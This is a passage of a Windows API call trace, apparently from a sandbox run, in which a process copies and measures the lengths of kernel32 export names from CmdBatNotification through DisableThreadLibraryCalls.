[0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0092.967] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0092.967] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0092.967] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0092.967] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0092.967] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0092.967] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0092.967] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0092.967] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0092.967] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0092.967] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0092.967] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0092.967] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0092.968] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0092.968] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0092.968] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0092.968] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0092.968] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0092.968] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0092.968] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0092.968] lstrlenA (lpString="COPYCONTEXT") returned 11 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0092.968] lstrlenA (lpString="COPYFILEA") returned 9 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0092.968] lstrlenA (lpString="COPYFILEEXA") returned 11 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0092.968] lstrlenA (lpString="COPYFILEEXW") returned 11 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0092.968] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0092.968] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0092.968] lstrlenA (lpString="COPYFILEW") returned 9 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0092.968] lstrlenA (lpString="COPYLZFILE") returned 10 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0092.968] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0092.968] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0092.969] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0092.969] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0092.969] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0092.969] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0092.969] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0092.969] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0092.969] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0092.969] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0092.969] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0092.969] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0092.969] lstrlenA (lpString="CREATEEVENTA") returned 12 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0092.969] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0092.969] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0092.969] lstrlenA (lpString="CREATEEVENTW") returned 12 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0092.969] lstrlenA (lpString="CREATEFIBER") returned 11 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0092.969] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0092.969] lstrlenA (lpString="CREATEFILEA") returned 11 [0092.969] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0092.970] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0092.970] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0092.970] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0092.970] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0092.970] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0092.970] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0092.970] lstrlenA (lpString="CREATEFILEW") returned 11 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0092.970] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0092.970] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0092.970] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0092.970] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0092.970] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0092.970] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0092.970] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0092.970] lstrlenA (lpString="CREATEJOBSET") returned 12 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0092.970] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0092.970] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0092.971] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0092.971] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0092.971] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0092.971] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0092.971] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0092.971] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0092.971] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0092.971] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0092.971] lstrlenA (lpString="CREATEPIPE") returned 10 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0092.971] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0092.971] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0092.971] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0092.971] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0092.971] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0092.971] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0092.971] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0092.971] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0092.972] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0092.972] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0092.972] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0092.972] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0092.972] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0092.972] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0092.972] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0092.972] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0092.972] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0092.972] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0092.972] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0092.972] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0092.972] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0092.973] lstrlenA (lpString="CREATETHREAD") returned 12 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0092.973] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0092.973] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0092.973] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0092.973] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0092.973] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0092.973] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0092.973] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0092.973] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0092.973] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0092.973] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0092.973] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0092.973] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0092.973] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0092.973] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0092.973] lstrlenA (lpString="CTRLROUTINE") returned 11 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0092.974] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0092.974] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0092.974] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0092.974] lstrlenA (lpString="DEBUGBREAK") returned 10 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0092.974] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0092.974] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0092.974] lstrlenA (lpString="DECODEPOINTER") returned 13 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0092.974] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0092.974] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0092.974] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0092.974] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0092.974] lstrlenA (lpString="DELETEATOM") returned 10 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0092.974] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0092.974] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0092.974] lstrlenA (lpString="DELETEFIBER") returned 11 [0092.974] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0092.974] lstrlenA (lpString="DELETEFILEA") returned 11 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0092.975] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0092.975] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0092.975] lstrlenA (lpString="DELETEFILEW") returned 11 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0092.975] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0092.975] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0092.975] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0092.975] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0092.975] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0092.975] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0092.975] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0092.975] lstrcpyA (in: lpString1=0x49af2a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" 